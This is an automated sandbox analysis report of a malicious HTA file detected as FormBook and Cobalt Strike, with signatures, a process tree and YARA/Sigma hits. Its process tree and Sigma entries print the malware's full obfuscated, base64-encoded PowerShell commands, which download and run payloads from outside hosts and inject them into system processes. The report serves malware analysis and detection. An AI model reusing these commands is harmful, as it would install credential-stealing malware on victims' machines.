Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
bestimylover.hta

Overview

General Information

Sample name:bestimylover.hta
Analysis ID:1568211
MD5:a61aacd5049328c9b8e3460d53e943ad
SHA1:ea66f697d5e07baf7dd6a4ab9d500688316b73fd
SHA256:c9d68c4787494badf47161637edf290f9297f8d66bb64fbc307fc7a978980509
Tags:htauser-abuse_ch
Infos:

Detection

Cobalt Strike, FormBook, HTMLPhisher
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Cobalt Strike Beacon
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected HtmlPhish44
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
PowerShell case anomaly found
Queues an APC in another process (thread injection)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: AspNetCompiler Execution
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 4080 cmdline: mshta.exe "C:\Users\user\Desktop\bestimylover.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 3532 cmdline: "C:\Windows\system32\cmd.exe" "/c pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpGY3FXayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDM4TDVlalpXSUdyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMjQ0L25pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm5ldy50aUZGIiwiJGVuVjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIiwwLDApO3NUQXJ0LXNMZWVwKDMpO0lJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIg=='+[cHAr]34+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6772 cmdline: pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpGY3FXayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDM4TDVlalpXSUdyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMjQ0L25pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm5ldy50aUZGIiwiJGVuVjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIiwwLDApO3NUQXJ0LXNMZWVwKDMpO0lJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIg=='+[cHAr]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 6884 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 6340 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES66CD.tmp" "c:\Users\user\AppData\Local\Temp\hfoj0pnm\CSC102A1040D3F84A7CBD6AF35F51E7FDEF.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • wscript.exe (PID: 3780 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightridingisreallyniceforworkingskillentiretimeforn.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
          • powershell.exe (PID: 6364 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $familial = 'JHNlcmVuYWRlID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGZ1Z3VzID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskYm94aWVyID0gJGZ1Z3VzLkRvd25sb2FkRGF0YSgkc2VyZW5hZGUpOyRwYXJ0aWN1bGFyaXplID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGJveGllcik7JHBsYWlubmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmF0dGxlYm94ZXMgPSAnPDxCQVNFNjRfRU5EPj4nOyRzdXBlcnByb2ZpdCA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHBsYWlubmVzcyk7JGNhbnRpbGxhdGluZyA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHJhdHRsZWJveGVzKTskc3VwZXJwcm9maXQgLWdlIDAgLWFuZCAkY2FudGlsbGF0aW5nIC1ndCAkc3VwZXJwcm9maXQ7JHN1cGVycHJvZml0ICs9ICRwbGFpbm5lc3MuTGVuZ3RoOyR1bmZyZWVkID0gJGNhbnRpbGxhdGluZyAtICRzdXBlcnByb2ZpdDskdmluY2FzID0gJHBhcnRpY3VsYXJpemUuU3Vic3RyaW5nKCRzdXBlcnByb2ZpdCwgJHVuZnJlZWQpOyRwcm9ib3NjaWRpYW4gPSAtam9pbiAoJHZpbmNhcy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkdmluY2FzLkxlbmd0aCldOyRrb21vbmRvciA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHByb2Jvc2NpZGlhbik7JG51cnNlcnltYW4gPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRrb21vbmRvcik7JGdhcm5pZXJpdGUgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKCdWQUknKTskZ2Fybmllcml0ZS5JbnZva2UoJG51bGwsIEAoJ3R4dC5GREdGUi80NDIvNTcxLjQ0LjI3MS43MDEvLzpwdHRoJywgJyRzYXlzdCcsICckc2F5c3QnLCAnJHNheXN0JywgJ2FzcG5ldF9jb21waWxlcicsICckc2F5c3QnLCAnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnMScsJyRzYXlzdCcpKTs=';$monophthongs = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($familial));Invoke-Expression $monophthongs MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 4080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • aspnet_compiler.exe (PID: 7380 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
            • aspnet_compiler.exe (PID: 7388 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
              • HDLzkMKGEKBh.exe (PID: 2856 cmdline: "C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                • msinfo32.exe (PID: 7604 cmdline: "C:\Windows\SysWOW64\msinfo32.exe" MD5: 5C49B7B55D4AF40DB1047E08484D6656)
                  • HDLzkMKGEKBh.exe (PID: 60 cmdline: "C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                  • firefox.exe (PID: 7908 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
bestimylover.htaJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000010.00000002.2658176307.0000000004BD0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000C.00000002.2122879253.00000000015E0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000C.00000002.2105673675.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000010.00000002.2658252130.0000000004C20000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              Click to see the 4 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              12.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                12.2.aspnet_compiler.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                  Other

                  SourceRuleDescriptionAuthorStrings
                  amsi32_6364.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                    amsi32_6364.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Base64 Encoded PowerShell Command Detected
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $familial = 'JHNlcmVuYWRlID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGZ1Z3VzID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskYm94aWVyID0gJGZ1Z3VzLkRvd25sb2FkRGF0YSgkc2VyZW5hZGUpOyRwYXJ0aWN1bGFyaXplID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGJveGllcik7JHBsYWlubmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmF0dGxlYm94ZXMgPSAnPDxCQVNFNjRfRU5EPj4nOyRzdXBlcnByb2ZpdCA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHBsYWlubmVzcyk7JGNhbnRpbGxhdGluZyA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHJhdHRsZWJveGVzKTskc3VwZXJwcm9maXQgLWdlIDAgLWFuZCAkY2FudGlsbGF0aW5nIC1ndCAkc3VwZXJwcm9maXQ7JHN1cGVycHJvZml0ICs9ICRwbGFpbm5lc3MuTGVuZ3RoOyR1bmZyZWVkID0gJGNhbnRpbGxhdGluZyAtICRzdXBlcnByb2ZpdDskdmluY2FzID0gJHBhcnRpY3VsYXJpemUuU3Vic3RyaW5nKCRzdXBlcnByb2ZpdCwgJHVuZnJlZWQpOyRwcm9ib3NjaWRpYW4gPSAtam9pbiAoJHZpbmNhcy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkdmluY2FzLkxlbmd0aCldOyRrb21vbmRvciA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHByb2Jvc2NpZGlhbik7JG51cnNlcnltYW4gPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRrb21vbmRvcik7JGdhcm5pZXJpdGUgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKCdWQUknKTskZ2Fybmllcml0ZS5JbnZva2UoJG51bGwsIEAoJ3R4dC5GREdGUi80NDIvNTcxLjQ0LjI3MS43MDEvLzpwdHRoJywgJyRzYXlzdCcsICckc2F5c3QnLCAnJHNheXN0JywgJ2FzcG5ldF9jb21waWxlcicsICckc2F5c3QnLCAnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnMScsJyRzYXlzdCcpKTs=';$monophthongs = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($familial));Invoke-Expression $monophthongs, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $familial = 'JHNlcmVuYWRlID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGZ1Z3VzID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskYm94aWVyID0gJGZ1Z3VzLkRvd25sb2FkRGF0YSgkc2VyZW5hZGUpOyRwYXJ0aWN1bGFyaXplID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGJveGllcik7JHBsYWlubmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmF0dGxlYm94ZXMgPSAnPDxCQVNFNjRfRU5EPj4nOyRzdXBlcnByb2ZpdCA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHBsYWlubmVzcyk7JGNhbnRpbGxhdGluZyA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHJhdHRsZWJveGVzKTskc3VwZXJwcm9maXQgLWdlIDAgLWFuZCAkY2FudGlsbGF0aW5nIC1ndCAkc3VwZXJwcm9maXQ7JHN1cGVycHJvZml0ICs9ICRwbGFpbm5lc3MuTGVuZ3RoOyR1bmZyZWVkID0gJGNhbnRpbGxhdGluZyAtICRzdXBlcnByb2ZpdDskdmluY2FzID0gJHBhcnRpY3VsYXJpemUuU3Vic3RyaW5nKCRzdXBlcnByb2ZpdCwgJHVuZnJlZWQpOyRwcm9ib3NjaWRpYW4gPSAtam9pbiAoJHZpbmNhcy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkdmluY2FzLkxlbmd0aCldOyRrb21vbmRvciA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHByb2Jvc2NpZGlhbik7JG51cnNlcnltYW4gPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRrb21vbmRvcik7JGdhcm5pZXJpdGUgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKCdWQUknKTskZ2Fybmllcml0ZS5JbnZva2UoJG51bGwsIEAoJ3R4dC5GREdGUi80NDIvNTcxLjQ0LjI3MS43MDEvLzpwdHRoJywgJyRzYXlzdCcsICckc2F5c3QnLCAnJ
                      Sigma detected: Potentially Suspicious PowerShell Child Processes
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightridingisreallyniceforworkingskillentiretimeforn.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightridingisreallyniceforworkingskillentiretimeforn.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpGY3FXayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDM4TDVlalpXSUdyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMjQ0L25pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm5ldy50aUZGIiwiJGVuVjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIiwwLDApO3NUQXJ0LXNMZWVwKDMpO0lJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIg=='+[cHAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6772, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightridingisreallyniceforworkingskillentiretimeforn.vbS" , ProcessId: 3780, ProcessName: wscript.exe
                      Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $familial = 'JHNlcmVuYWRlID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGZ1Z3VzID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskYm94aWVyID0gJGZ1Z3VzLkRvd25sb2FkRGF0YSgkc2VyZW5hZGUpOyRwYXJ0aWN1bGFyaXplID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGJveGllcik7JHBsYWlubmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmF0dGxlYm94ZXMgPSAnPDxCQVNFNjRfRU5EPj4nOyRzdXBlcnByb2ZpdCA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHBsYWlubmVzcyk7JGNhbnRpbGxhdGluZyA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHJhdHRsZWJveGVzKTskc3VwZXJwcm9maXQgLWdlIDAgLWFuZCAkY2FudGlsbGF0aW5nIC1ndCAkc3VwZXJwcm9maXQ7JHN1cGVycHJvZml0ICs9ICRwbGFpbm5lc3MuTGVuZ3RoOyR1bmZyZWVkID0gJGNhbnRpbGxhdGluZyAtICRzdXBlcnByb2ZpdDskdmluY2FzID0gJHBhcnRpY3VsYXJpemUuU3Vic3RyaW5nKCRzdXBlcnByb2ZpdCwgJHVuZnJlZWQpOyRwcm9ib3NjaWRpYW4gPSAtam9pbiAoJHZpbmNhcy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkdmluY2FzLkxlbmd0aCldOyRrb21vbmRvciA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHByb2Jvc2NpZGlhbik7JG51cnNlcnltYW4gPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRrb21vbmRvcik7JGdhcm5pZXJpdGUgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKCdWQUknKTskZ2Fybmllcml0ZS5JbnZva2UoJG51bGwsIEAoJ3R4dC5GREdGUi80NDIvNTcxLjQ0LjI3MS43MDEvLzpwdHRoJywgJyRzYXlzdCcsICckc2F5c3QnLCAnJHNheXN0JywgJ2FzcG5ldF9jb21waWxlcicsICckc2F5c3QnLCAnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnMScsJyRzYXlzdCcpKTs=';$monophthongs = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($familial));Invoke-Expression $monophthongs, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $familial = 